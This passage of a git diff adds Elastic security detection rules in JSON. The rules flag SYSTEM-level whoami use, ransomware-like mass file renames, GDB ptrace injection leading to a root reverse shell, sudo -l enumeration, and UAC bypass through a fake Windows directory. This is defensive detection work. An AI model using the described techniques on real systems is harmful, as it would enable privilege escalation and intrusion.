\"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n process.name : \"whoami.exe\" or\n (\n process.name : \"net1.exe\" and not process.parent.name : \"net.exe\" and not process.args : (\"start\", \"stop\", \"/active:*\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_8.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_8.json new file mode 100644 index 00000000000..b35dc24e64e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_8.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Changes Activity Detected", + "query": "sequence by process.entity_id, host.id with maxspan=1s\n [file where host.os.type == \"linux\" and event.type == \"change\" and event.action == \"rename\" and file.extension : \"?*\" \n and process.executable : (\"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/dev/shm/*\", \"/var/run/*\", \"/boot/*\", \"/srv/*\", \"/run/*\") and\n file.path : (\n \"/home/*/Downloads/*\", \"/home/*/Documents/*\", \"/root/*\", \"/bin/*\", \"/usr/bin/*\", \"/var/log/*\", \"/var/lib/log/*\",\n \"/var/backup/*\", \"/var/www/*\"\n ) and\n not process.name : (\n \"dpkg\", \"yum\", \"dnf\", \"rpm\", \"dockerd\", \"go\", \"java\", \"pip*\", \"python*\", \"node\", \"containerd\", \"php\", \"p4d\",\n \"conda\", \"chrome\", \"imap\", \"cmake\", \"firefox\", \"semanage\", \"semodule\", \"ansible-galaxy\", \"fc-cache\", \"jammy\", \"git\",\n \"systemsettings\", \"vmis-launcher\", \"bundle\", \"kudu-tserver\", \"suldownloader\"\n )\n ] with runs=25\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "28738f9f-7427-4d23-bc69-756708b5f624", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "28738f9f-7427-4d23-bc69-756708b5f624_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/28bc620d-b2f7-4132-b372-f77953881d05_2.json b/packages/security_detection_engine/kibana/security_rule/28bc620d-b2f7-4132-b372-f77953881d05_2.json new file mode 100644 index 00000000000..20e07ed65d5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/28bc620d-b2f7-4132-b372-f77953881d05_2.json @@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where GDB (granted the CAP_SYS_PTRACE capability) is executed, after which an outbound network connection is initiated by UID/GID 0 (root). In Linux, the CAP_SYS_PTRACE capability grants a process the ability to use the ptrace system call, which is typically used for debugging and allows the process to trace and control other processes. Attackers may leverage this capability to hook and inject into a process that is running with root permissions in order to execute shell code and gain a reverse shell with root privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Root Network Connection via GDB CAP_SYS_PTRACE", + "query": "sequence by host.id, process.entry_leader.entity_id with maxspan=30s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"gdb\" and\n (process.thread.capabilities.effective : \"CAP_SYS_PTRACE\" or process.thread.capabilities.permitted : \"CAP_SYS_PTRACE\") and\n user.id != \"0\"]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and\n process.name != null and user.id == \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "28bc620d-b2f7-4132-b372-f77953881d05", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "28bc620d-b2f7-4132-b372-f77953881d05_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_5.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_5.json new file mode 100644 index 00000000000..1065e63c1e5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_5.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Sudo Command Enumeration Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"sudo\" and process.args == \"-l\" and process.args_count == 2 and\nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and \nnot group.Ext.real.id : \"0\" and not user.Ext.real.id : \"0\" and not process.args == \"dpkg\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "28d39238-0c01-420a-b77a-24e5a7378663", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "28d39238-0c01-420a-b77a-24e5a7378663_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_111.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_111.json new file mode 100644 index 00000000000..ea973f5f6e7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_111.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Windows Directory Masquerading", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", + "references": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "290aca65-e94d-403b-ba0f-62f320e63f51_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_112.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_112.json new file mode 100644 index 00000000000..ff0dfef8bf3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_112.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Windows Directory Masquerading", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", + "references": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + 